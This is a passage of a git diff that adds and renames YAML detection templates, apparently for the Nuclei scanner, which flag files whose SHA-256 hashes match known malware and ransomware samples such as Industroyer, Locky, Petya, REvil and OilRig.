@@ -0,0 +1,22 @@ +id: furtim-malware-hash +info: + name: Furtim Malware Hash - Detect + author: pussycat0x + severity: info + description: | + Detects Furtim Parent Malware. + reference: + - https://sentinelone.com/blogs/sfg-furtims-parent/ + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_furtim.yar + tags: malware,apt,furtim + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '766e49811c0bb7cce217e72e73a6aa866c15de0ba11d7dda3bd7e9ec33ed6963'" + - "sha256(raw) == '4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948'" + condition: or diff --git a/file/malware/hash/gimmick-malware.yaml b/file/malware/hash/gimmick-malware-hash.yaml similarity index 80% rename from file/malware/hash/gimmick-malware.yaml rename to file/malware/hash/gimmick-malware-hash.yaml index 2a4065fec8..950936cdfe 100644 --- a/file/malware/hash/gimmick-malware.yaml +++ b/file/malware/hash/gimmick-malware-hash.yaml @@ -1,6 +1,6 @@ -id: gimmick-malware +id: gimmick-malware-hash info: - name: GIMMICK Malware - Detect + name: GIMMICK Malware Hash - Detect author: pussycat0x severity: info description: Detects the macOS port of the GIMMICK malware. diff --git a/file/malware/hash/godzilla-webshell.yaml b/file/malware/hash/godzilla-webshell-hash.yaml similarity index 84% rename from file/malware/hash/godzilla-webshell.yaml rename to file/malware/hash/godzilla-webshell-hash.yaml index 3866d10a8c..a37489fa00 100644 --- a/file/malware/hash/godzilla-webshell.yaml +++ b/file/malware/hash/godzilla-webshell-hash.yaml @@ -1,6 +1,6 @@ -id: godzilla-webshell +id: godzilla-webshell-hash info: - name: Godzilla Webshell - Detect + name: Godzilla Webshell Hash - Detect author: pussycat0x severity: info description: Detects the JSP implementation of the Godzilla Webshell. diff --git a/file/malware/hash/greenbug-malware-hash.yaml b/file/malware/hash/greenbug-malware-hash.yaml new file mode 100644 index 0000000000..10ba934f94 --- /dev/null +++ b/file/malware/hash/greenbug-malware-hash.yaml @@ -0,0 +1,32 @@ +id: greenbug-malware-hash +info: + name: Greenbug Malware Hash - Detect + author: pussycat0x + severity: info + description: | + Detects Malware from Greenbug Incident + reference: + - https://goo.gl/urp4CD + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Greenbug.yar + tags: malware,Greenbug + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == 'dab460a0b73e79299fbff2fa301420c1d97a36da7426acc0e903c70495db2b76'" + - "sha256(raw) == '6b28a43eda5b6f828a65574e3f08a6d00e0acf84cbb94aac5cec5cd448a4649d'" + - "sha256(raw) == '21f5e60e9df6642dbbceca623ad59ad1778ea506b7932d75ea8db02230ce3685'" + - "sha256(raw) == '319a001d09ee9d754e8789116bbb21a3c624c999dae9cf83fde90a3fbe67ee6'" + - "sha256(raw) == '44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49'" + - "sha256(raw) == '7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c'" + - "sha256(raw) == '308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f'" + - "sha256(raw) == '82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9'" + - "sha256(raw) == '308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f'" + - "sha256(raw) == '44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49'" + - "sha256(raw) == '7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c'" + - "sha256(raw) == '82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/ico-malware.yaml b/file/malware/hash/ico-malware-hash.yaml similarity index 92% rename from file/malware/hash/ico-malware.yaml rename to file/malware/hash/ico-malware-hash.yaml index 0e9dfa61f4..20282972b6 100644 --- a/file/malware/hash/ico-malware.yaml +++ b/file/malware/hash/ico-malware-hash.yaml @@ -1,12 +1,12 @@ -id: ico-malware +id: ico-malware-hash info: - name: ICO Malware - Detect + name: ICO Malware Hash - Detect author: pussycat0x severity: info description: Detection of malicious ICO files used in 3CX compromise reference: - https://github.com/volexity/threat-intel/blob/main/2023/2023-03-30%203CX/indicators/rules.yar - tags: malware,UTA0040 + tags: malware,uta0040 file: - extensions: diff --git a/file/malware/hash/industroyer-malware-hash.yaml b/file/malware/hash/industroyer-malware-hash.yaml new file mode 100644 index 0000000000..9a4ccf54db --- /dev/null +++ b/file/malware/hash/industroyer-malware-hash.yaml @@ -0,0 +1,28 @@ +id: industroyer-malware-hash +info: + name: Industroyer Malware Hash - Detect + author: pussycat0x + severity: info + description: Detects Industroyer related malware + reference: + - https://goo.gl/x81cSy + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Industroyer.yar + tags: malware,industroyer,apt + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == 'ad23c7930dae02de1ea3c6836091b5fb3c62a89bf2bcfb83b4b39ede15904910'" + - "sha256(raw) == '018eb62e174efdcdb3af011d34b0bf2284ed1a803718fba6edffe5bc0b446b81'" + - "sha256(raw) == '3e3ab9674142dec46ce389e9e759b6484e847f5c1e1fc682fc638fc837c13571'" + - "sha256(raw) == '37d54e3d5e8b838f366b9c202f75fa264611a12444e62ae759c31a0d041aa6e4'" + - "sha256(raw) == 'ecaf150e087ddff0ec6463c92f7f6cca23cc4fd30fe34c10b3cb7c2a6d135c77'" + - "sha256(raw) == '6d707e647427f1ff4a7a9420188a8831f433ad8c5325dc8b8cc6fc5e7f1f6f47'" + - "sha256(raw) == '893e4cca7fe58191d2f6722b383b5e8009d3885b5913dcd2e3577e5a763cdb3f'" + - "sha256(raw) == '21c1fdd6cfd8ec3ffe3e922f944424b543643dbdab99fa731556f8805b0d5561'" + - "sha256(raw) == '7907dd95c1d36cf3dc842a1bd804f0db511a0f68f4b3d382c23a3c974a383cad'" + condition: or diff --git a/file/malware/hash/ironPanda-htran-malware-hash.yaml b/file/malware/hash/ironPanda-htran-malware-hash.yaml new file mode 100644 index 0000000000..9044c3a27e --- /dev/null +++ b/file/malware/hash/ironPanda-htran-malware-hash.yaml @@ -0,0 +1,21 @@ +id: ironPanda-htran-malware-hash +info: + name: Iron Panda Malware Htran Hash - Detect + author: pussycat0x + severity: info + description: | + Iron Panda Malware Htran + reference: + - https://goo.gl/E4qia9 + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Irontiger.yar + tags: malware,ironpanda + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7'" + diff --git a/file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml b/file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml new file mode 100644 index 0000000000..78ce70e8ad --- /dev/null +++ b/file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml @@ -0,0 +1,21 @@ +id: ironpanda-dnstunclient-malware-hash +info: + name: Iron Panda malware DnsTunClient Hash - Detect + author: pussycat0x + severity: info + description: | + Iron Panda malware DnsTunClient - file named.exe + reference: + - https://goo.gl/E4qia9 + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Irontiger.yar + tags: malware,ironpanda + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == 'a08db49e198068709b7e52f16d00a10d72b4d26562c0d82b4544f8b0fb259431'" + diff --git a/file/malware/hash/ironpanda-malware-hash.yaml b/file/malware/hash/ironpanda-malware-hash.yaml new file mode 100644 index 0000000000..241e17b3cd --- /dev/null +++ b/file/malware/hash/ironpanda-malware-hash.yaml @@ -0,0 +1,22 @@ +id: ironpanda-malware-hash +info: + name: Iron Panda Malware Hash - Detect + author: pussycat0x + severity: info + description: Iron Panda Malware + reference: + - https://goo.gl/E4qia9 + tags: malware,IronPanda + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == 'a0cee5822ddf254c254a5a0b7372c9d2b46b088a254a1208cb32f5fe7eca848a'" + - "sha256(raw) == 'a89c21dd608c51c4bf0323d640f816e464578510389f9edcf04cd34090decc91'" + - "sha256(raw) == '5cd2af844e718570ae7ba9773a9075738c0b3b75c65909437c43201ce596a742'" + - "sha256(raw) == '0d6da946026154416f49df2283252d01ecfb0c41c27ef3bc79029483adc2240c'" + condition: or diff --git a/file/malware/hash/locky-ransomware-hash.yaml b/file/malware/hash/locky-ransomware-hash.yaml new file mode 100644 index 0000000000..05dca81de7 --- /dev/null +++ b/file/malware/hash/locky-ransomware-hash.yaml @@ -0,0 +1,21 @@ +id: locky-ransomware-hash +info: + name: Locky Ransomware Hash - Detect + author: pussycat0x + severity: info + description: | + Detects Locky Ransomware (matches also on Win32/Kuluoz) + reference: + - https://goo.gl/qScSrE + - https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Locky.yar + tags: ransomware,malware + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8'" + diff --git a/file/malware/hash/minidionis-readerview-malware-hash.yaml b/file/malware/hash/minidionis-readerview-malware-hash.yaml new file mode 100644 index 0000000000..1a03e309bc --- /dev/null +++ b/file/malware/hash/minidionis-readerview-malware-hash.yaml @@ -0,0 +1,26 @@ +id: minidionis-readerview-malware-hash +info: + name: MiniDionis Malware Hash - Detect + author: pussycat0x + severity: info + description: | + MiniDionis Malware - file readerView.exe / adobe.exe + reference: + - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950 + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Minidionis.yar + tags: malware,minidionis + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == 'ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145'" + - "sha256(raw) == 'a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004'" + - "sha256(raw) == '88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f'" + - "sha256(raw) == '97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7'" + - "sha256(raw) == 'ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46'" + - "sha256(raw) == '56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e'" + condition: or diff --git a/file/malware/hash/minidionis-vbs-malware-hash.yaml b/file/malware/hash/minidionis-vbs-malware-hash.yaml new file mode 100644 index 0000000000..833c4a0c82 --- /dev/null +++ b/file/malware/hash/minidionis-vbs-malware-hash.yaml @@ -0,0 +1,19 @@ +id: minidionis-vbs-malware-hash +info: + name: MiniDionis VBS Dropped File Hash - Detect + author: pussycat0x + severity: info + description: Detect Dropped File - 1.vbs + reference: + - https://malwr.com/analysis/ZDc4ZmIyZDI4MTVjNGY5NWI0YzE3YjIzNGFjZTcyYTY/ + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Minidionis.yar + tags: malware,minidionis + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '97dd1ee3aca815eb655a5de9e9e8945e7ba57f458019be6e1b9acb5731fa6646'" diff --git a/file/malware/hash/naikon-apt-malware-hash.yaml b/file/malware/hash/naikon-apt-malware-hash.yaml new file mode 100644 index 0000000000..7e7011d5b1 --- /dev/null +++ b/file/malware/hash/naikon-apt-malware-hash.yaml @@ -0,0 +1,19 @@ +id: naikon-apt-malware-hash +info: + name: Backdoor Naikon APT Malware Hash - Detect + author: pussycat0x + severity: info + reference: + - https://goo.gl/7vHyvh +tags: malware,naikon + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == 'd5716c80cba8554eb79eecfb4aa3d99faf0435a1833ec5ef51f528146c758eba'" + - "sha256(raw) == 'f5ab8e49c0778fa208baad660fe4fa40fc8a114f5f71614afbd6dcc09625cb96'" + condition: or diff --git a/file/malware/hash/neuron2-malware-hash.yaml b/file/malware/hash/neuron2-malware-hash.yaml new file mode 100644 index 0000000000..d90848501f --- /dev/null +++ b/file/malware/hash/neuron2-malware-hash.yaml @@ -0,0 +1,20 @@ +id: neuron2-malware-hash +info: + name: Neuron2 Loader Strings Turla APT loader Hash - Detect + author: pussycat0x + severity: info + reference: | + - https://www.ncsc.gov.uk/alerts/turla-group-malware + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Turla_Neuron.yar + tags: malware,turla,neuron2,apt + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '51616b207fde2ff1360a1364ff58270e0d46cf87a4c0c21b374a834dd9676927'" + - "sha256(raw) == '83d8922e7a8212f1a2a9015973e668d7999b90e7000c31f57be83803747df015'" + condition: or diff --git a/file/malware/hash/oilrig-malware-hash.yaml b/file/malware/hash/oilrig-malware-hash.yaml new file mode 100644 index 0000000000..62bf87eb9c --- /dev/null +++ b/file/malware/hash/oilrig-malware-hash.yaml @@ -0,0 +1,45 @@ +id: oilrig-malware-hash +info: + name: OilRig Malware Campaign Gen1 Hash - Detect + author: pussycat0x + severity: info + description: | + Detects malware from OilRig Campaign + reference: + - https://goo.gl/QMRZ8K + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Oilrig.yar + tags: malware,oilrig,apt + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == 'd808f3109822c185f1d8e1bf7ef7781c219dc56f5906478651748f0ace489d34'" + - "sha256(raw) == '80161dad1603b9a7c4a92a07b5c8bce214cf7a3df897b561732f9df7920ecb3e'" + - "sha256(raw) == '662c53e69b66d62a4822e666031fd441bbdfa741e20d4511c6741ec3cb02475f'" + - "sha256(raw) == '903b6d948c16dc92b69fe1de76cf64ab8377893770bf47c29bf91f3fd987f996'" + - "sha256(raw) == 'c4fbc723981fc94884f0f493cb8711fdc9da698980081d9b7c139fcffbe723da'" + - "sha256(raw) == '57efb7596e6d9fd019b4dc4587ba33a40ab0ca09e14281d85716a253c5612ef4'" + - "sha256(raw) == '1b2fee00d28782076178a63e669d2306c37ba0c417708d4dc1f751765c3f94e1'" + - "sha256(raw) == '9f31a1908afb23a1029c079ee9ba8bdf0f4c815addbe8eac85b4163e02b5e777'" + - "sha256(raw) == '0cd9857a3f626f8e0c07495a4799c59d502c4f3970642a76882e3ed68b790f8e'" + - "sha256(raw) == '4b5112f0fb64825b879b01d686e8f4d43521252a3b4f4026c9d1d76d3f15b281'" + - "sha256(raw) == '4e5b85ea68bf8f2306b6b931810ae38c8dff3679d78da1af2c91032c36380353'" + - "sha256(raw) == 'c3c17383f43184a29f49f166a92453a34be18e51935ddbf09576a60441440e51'" + - "sha256(raw) == 'f3856c7af3c9f84101f41a82e36fc81dfc18a8e9b424a3658b6ba7e3c99f54f2'" + - "sha256(raw) == '0c64ab9b0c122b1903e8063e3c2c357cbbee99de07dc535e6c830a0472a71f39'" + - "sha256(raw) == 'd874f513a032ccb6a5e4f0cd55862b024ea0bee4de94ccf950b3dd894066065d'" + - "sha256(raw) == '8ee628d46b8af20c4ba70a2fe8e2d4edca1980583171b71fe72455c6a52d15a9'" + - "sha256(raw) == '55d0e12439b20dadb5868766a5200cbbe1a06053bf9e229cf6a852bfcf57d579'" + - "sha256(raw) == '528d432952ef879496542bc62a5a4b6eee788f60f220426bd7f933fa2c58dc6b'" + - "sha256(raw) == '93940b5e764f2f4a2d893bebef4bf1f7d63c4db856877020a5852a6647cb04a0'" + - "sha256(raw) == 'e2ec7fa60e654f5861e09bbe59d14d0973bd5727b83a2a03f1cecf1466dd87aa'" + - "sha256(raw) == '9c0a33a5dc62933f17506f20e0258f877947bdcd15b091a597eac05d299b7471'" + - "sha256(raw) == 'a787c0e42608f9a69f718f6dca5556607be45ec77d17b07eb9ea1e0f7bb2e064'" + - "sha256(raw) == '3772d473a2fe950959e1fd56c9a44ec48928f92522246f75f4b8cb134f4713ff'" + - "sha256(raw) == '3986d54b00647b507b2afd708b7a1ce4c37027fb77d67c6bc3c20c3ac1a88ca4'" + - "sha256(raw) == 'f5a64de9087b138608ccf036b067d91a47302259269fb05b3349964ca4060e7e'" + condition: or diff --git a/file/malware/hash/passcv-ntscan-malware-hash.yaml b/file/malware/hash/passcv-ntscan-malware-hash.yaml new file mode 100644 index 0000000000..3a03868558 --- /dev/null +++ b/file/malware/hash/passcv-ntscan-malware-hash.yaml @@ -0,0 +1,19 @@ +id: passcv-ntscan-malware-hash +info: + name: PassCV Sabre Tool NTScan Malware Hash - Detect + author: pussycat0x + severity: info + description: PassCV Malware mentioned in Cylance Report + reference: + - https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Passcv.yar + tags: malware,passcv + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '0f290612b26349a551a148304a0bd3b0d0651e9563425d7c362f30bd492d8665'" diff --git a/file/malware/hash/passcv-sabre-malware-hash.yaml b/file/malware/hash/passcv-sabre-malware-hash.yaml new file mode 100644 index 0000000000..f3baf97e41 --- /dev/null +++ b/file/malware/hash/passcv-sabre-malware-hash.yaml @@ -0,0 +1,29 @@ +id: passcv-sabre-malware-hash +info: + name: PassCV Sabre Malware Hash - Detect + author: pussycat0x + severity: info + description: | + PassCV Malware mentioned in Cylance Report + reference: + - https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Passcv.yar + tags: malware,passcv + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '24a9bfbff81615a42e42755711c8d04f359f3bf815fb338022edca860ff1908a'" + - "sha256(raw) == 'e61e56b8f2666b9e605127b4fcc7dc23871c1ae25aa0a4ea23b48c9de35d5f55'" + - "sha256(raw) == '475d1c2d36b2cf28b28b202ada78168e7482a98b42ff980bbb2f65c6483db5b4'" + - "sha256(raw) == '009645c628e719fad2e280ef60bbd8e49bf057196ac09b3f70065f1ad2df9b78'" + - "sha256(raw) == '92479c7503393fc4b8dd7c5cd1d3479a182abca3cda21943279c68a8eef9c64b'" + - "sha256(raw) == '0c7b952c64db7add5b8b50b1199fc7d82e9b6ac07193d9ec30e5b8d353b1f6d2'" + - "sha256(raw) == '28c7575b2368a9b58d0d1bf22257c4811bd3c212bd606afc7e65904041c29ce1'" + - "sha256(raw) == '27463bcb4301f0fdd95bc10bf67f9049e161a4e51425dac87949387c54c9167f'" + - "sha256(raw) == '03aafc5f468a84f7dd7d7d38f91ff17ef1ca044e5f5e8bbdfe589f5509b46ae5'" + condition: or diff --git a/file/malware/hash/passcv-signingcert-malware-hash.yaml b/file/malware/hash/passcv-signingcert-malware-hash.yaml new file mode 100644 index 0000000000..665d68140e --- /dev/null +++ b/file/malware/hash/passcv-signingcert-malware-hash.yaml @@ -0,0 +1,21 @@ +id: passcv-signingcert-malware-hash +info: + name: PassCV Sabre Malware Signing Cert Hash - Detect + author: pussycat0x + severity: info + description: | + PassCV Malware mentioned in Cylance Report + reference: + - https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Passcv.yar + tags: malware,passcv + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '7c32885c258a6d5be37ebe83643f00165da3ebf963471503909781540204752e'" + diff --git a/file/malware/hash/petya-ransomware-hash.yaml b/file/malware/hash/petya-ransomware-hash.yaml new file mode 100644 index 0000000000..a4ced71871 --- /dev/null +++ b/file/malware/hash/petya-ransomware-hash.yaml @@ -0,0 +1,19 @@ +id: petya-ransomware-hash +info: + name: Petya Ransomware Hash - Detect + author: pussycat0x + severity: info + description: | + Detects Petya Ransomware. + reference: + - http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html +tags: ransomware,malware + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739'" diff --git a/file/malware/hash/poseidongroup-maldoc-malware-hash.yaml b/file/malware/hash/poseidongroup-maldoc-malware-hash.yaml new file mode 100644 index 0000000000..8f0f4d8467 --- /dev/null +++ b/file/malware/hash/poseidongroup-maldoc-malware-hash.yaml @@ -0,0 +1,27 @@ +id: poseidongroup-maldoc-malware-hash +info: + name: Poseidon Group Malicious Word Document Hash - Detect + author: pussycat0x + severity: info + description: Detects Poseidon Group - Malicious Word Document + reference: + - https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/ + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Poseidon_Group.yar + tags: malware,poseidon + +file: + extensions: + - doc + - docx + + matchers: + type: dsl + dsl: + - "sha256(raw) == '3e4cacab0ff950da1c6a1c640fe6cf5555b99e36d4e1cf5c45f04a2048f7620c'" + - "sha256(raw) == '1f77475d7740eb0c5802746d63e93218f16a7a19f616e8fddcbff07983b851af'" + - "sha256(raw) == 'f028ee20363d3a17d30175508bbc4738dd8e245a94bfb200219a40464dd09b3a'" + - "sha256(raw) == 'ec309300c950936a1b9f900aa30630b33723c42240ca4db978f2ca5e0f97afed'" + - "sha256(raw) == '27449198542fed64c23f583617908c8648fa4b4633bacd224f97e7f5d8b18778'" + - "sha256(raw) == '1e62629dae05bf7ee3fe1346faa60e6791c61f92dd921daa5ce2bdce2e9d4216'" + - "sha256(raw) == '0983526d7f0640e5765ded6be6c9e64869172a02c20023f8a006396ff358999b'" + condition: or diff --git a/file/malware/hash/poseidongroup-malware-hash.yaml b/file/malware/hash/poseidongroup-malware-hash.yaml new file mode 100644 index 0000000000..8a13db558d --- /dev/null +++ b/file/malware/hash/poseidongroup-malware-hash.yaml @@ -0,0 +1,26 @@ +id: poseidongroup-malware-hash +info: + name: Poseidon Group Malware Hash - Detect + author: pussycat0x + severity: info + description: Detects Poseidon Group Malware + reference: + - https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/ + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Poseidon_Group.yar + tags: malware + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '337e94119cfad0b3144af81b72ac3b2688a219ffa0bdf23ca56c7a68fbe0aea4'" + - "sha256(raw) == '344034c0bf9fcd52883dbc158abf6db687150d40a118d9cd6ebd843e186128d3'" + - "sha256(raw) == '432b7f7f7bf94260a58ad720f61d91ba3289bf0a9789fc0c2b7ca900788dae61'" + - "sha256(raw) == '8955df76182005a69f19f5421c355f1868efe65d6b9e0145625dceda94b84a47'" + - "sha256(raw) == 'd090b1d77e91848b1e2f5690b54360bbbd7ef808d017304389b90a0f8423367f'" + - "sha256(raw) == 'd7c8b47a0d0a9181fb993f17e165d75a6be8cf11812d3baf7cf11d085e21d4fb'" + - "sha256(raw) == 'ded0ee29af97496f27d810f6c16d78a3031d8c2193d5d2a87355f3e3ca58f9b3'" + condition: or diff --git a/file/malware/hash/powerstar-malware.yaml b/file/malware/hash/powerstar-malware-hash.yaml similarity index 89% rename from file/malware/hash/powerstar-malware.yaml rename to file/malware/hash/powerstar-malware-hash.yaml index 8efae04aec..9a09056a27 100644 --- a/file/malware/hash/powerstar-malware.yaml +++ b/file/malware/hash/powerstar-malware-hash.yaml @@ -1,6 +1,6 @@ -id: powerstar-malware +id: powerstar-malware-hash info: - name: PowerStar Malware - Detect + name: PowerStar Malware Hash - Detect author: pussycat0x severity: info description: Detects the batch script used to persist PowerStar via Startup. diff --git a/file/malware/hash/purplewave-malware-hash.yaml b/file/malware/hash/purplewave-malware-hash.yaml new file mode 100644 index 0000000000..8492e1a9c7 --- /dev/null +++ b/file/malware/hash/purplewave-malware-hash.yaml @@ -0,0 +1,27 @@ +id: purplewave-malware-hash +info: + name: PurpleWave v1.0 Malware Hash - Detect + author: pussycat0x + severity: info + reference: + - https://twitter.com/3xp0rtblog/status/1289125217751781376 + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_PurpleWave.yar +tags: malware,apt,purplewave + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '7de7b866c46f34be28f7085fb1a1727ab939d65abd3128871fb68c42371af2df'" + - "sha256(raw) == '76bffcf04104a1c4e6a5792d3795d1a03c7497a274042889b8f44c8f8facc304'" + - "sha256(raw) == '832d667b00c07424f050f84e717f8db22833b1e8e131aa7a33de739c4f4b4cdd'" + - "sha256(raw) == '917057a6a03252bc2525b326a63111fce050fc86e6e3b26fa9e452489f1358b9'" + - "sha256(raw) == 'a8577e1ccad877ae5ff4bf89aa578989404643c6fdf10baafd4335a1766abb16'" + - "sha256(raw) == 'd5ec98c98a8f56fdeb00cc2404c4527a39726bf43d8b9cf6c4c8c36364f94161'" + - "sha256(raw) == 'd820ec7f9196a5cc3dbc2b5860334a2e174fede80efc3b8463756fb8767dddf9'" + - "sha256(raw) == 'd4572e26b9e6ce963af590979afe3df6e1be78aa8ec0e926e77b0affb7ab1554'" + - "sha256(raw) == '4b3cb90581dcd77c9ceffbd662b8dac70b68de5a03cd56940434cc035209d61d'" + condition: or diff --git a/file/malware/hash/red-leaves-malware-hash.yaml b/file/malware/hash/red-leaves-malware-hash.yaml new file mode 100644 index 0000000000..b131749599 --- /dev/null +++ b/file/malware/hash/red-leaves-malware-hash.yaml @@ -0,0 +1,21 @@ +id: red-leaves-malware-hash +info: + name: Red Leaves Malware Hash - Detect + author: pussycat0x + severity: info + description: | + Red Leaves malware, related to APT10 + reference: + - https://www.virustotal.com/ + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_RedLeaves.yar + tags: malware,apt,red-leaves + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c'" + diff --git a/file/malware/hash/regeorg-webshell.yaml b/file/malware/hash/regeorg-webshell-hash.yaml similarity index 89% rename from file/malware/hash/regeorg-webshell.yaml rename to file/malware/hash/regeorg-webshell-hash.yaml index f4520f0c64..a3abb6c429 100644 --- a/file/malware/hash/regeorg-webshell.yaml +++ b/file/malware/hash/regeorg-webshell-hash.yaml @@ -1,6 +1,6 @@ -id: regeorg-webshel +id: regeorg-webshell-hash info: - name: ReGeorg Webshell - Detect + name: ReGeorg Webshell Hash - Detect author: pussycat0x severity: info description: Detects the reGeorg webshells' JSP version. diff --git a/file/malware/hash/revil-ransomware-hash.yaml b/file/malware/hash/revil-ransomware-hash.yaml new file mode 100644 index 0000000000..9d6c61a8fa --- /dev/null +++ b/file/malware/hash/revil-ransomware-hash.yaml @@ -0,0 +1,22 @@ +id: revil-ransomware-hash +info: + name: Revil Ransomware Hash - Detect + author: pussycat0x + severity: info + description: + Detect Revil Ransomware. + reference: + - https://angle.ankura.com/post/102hcny/revix-linux-ransomware + - https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Revix.yar +tags: ransomware,malware + +file: + extensions: + - all + matchers: + type: dsl + dsl: + - "sha256(raw) == 'f864922f947a6bb7d894245b53795b54b9378c0f7633c521240488e86f60c2c5'" + - "sha256(raw) == '559e9c0a2ef6898fabaf0a5fb10ac4a0f8d721edde4758351910200fe16b5fa7'" + - "sha256(raw) == 'ea1872b2835128e3cb49a0bc27e4727ca33c4e6eba1e80422db19b505f965bc4'" + condition: or diff --git a/file/malware/hash/rokrat-malware-hash.yaml b/file/malware/hash/rokrat-malware-hash.yaml new file mode 100644 index 0000000000..a531c05afa --- /dev/null +++ b/file/malware/hash/rokrat-malware-hash.yaml @@ -0,0 +1,20 @@ +id: rokrat-malware-hash +info: + name: ROKRAT Loader Malware Hash- Detect + author: pussycat0x + severity: info + description: | + Designed to catch loader observed used with ROKRAT malware + reference: + - https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/ + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_DPRK_ROKRAT.yar + tags: malware,taudprkapt + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == 'e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd'" \ No newline at end of file diff --git a/file/malware/hash/rokrat-malware.yaml b/file/malware/hash/rokrat-malware.yaml deleted file mode 100644 index 0f5cd8f94e..0000000000 --- a/file/malware/hash/rokrat-malware.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: rokrat-malware -info: - name: Rokrat Malware - Detect - author: pussycat0x - severity: info - description: Ruby loader seen loading the ROKRAT malware family. - reference: - - https://github.com/volexity/threat-intel/blob/main/2021/2021-08-24%20-%20InkySquid%20Part%202/indicators/yara.yar - tags: malware,inkysquid - -file: - - extensions: - - all - - matchers: - - type: dsl - dsl: - - "sha256(raw) == '5bc52f6c1c0d0131cee30b4f192ce738ad70bcb56e84180f464a5125d1a784b2'" - - "sha256(raw) == '80269413be6ad51b8b19631b2f5559c9572842e789bbce031babe6e879d2e120'" - - "sha256(raw) == '6a452d088d60113f623b852f33f8f9acf0d4197af29781f889613fed38f57855'" - - "sha256(raw) == '85cd5c3bb028fe6931130ccd5d0b0c535c01ce2bcda660a3b72581a1a5382904'" - condition: or \ No newline at end of file diff --git a/file/malware/hash/sauron-malware-hash.yaml b/file/malware/hash/sauron-malware-hash.yaml new file mode 100644 index 0000000000..971ab64786 --- /dev/null +++ b/file/malware/hash/sauron-malware-hash.yaml @@ -0,0 +1,26 @@ +id: sauron-malware-hash +info: + name: Sauron Malware Hash - Detect + author: pussycat0x + severity: info + description: Detects malware from Project Sauron APT + reference: + - https://goo.gl/eFoP4A + - 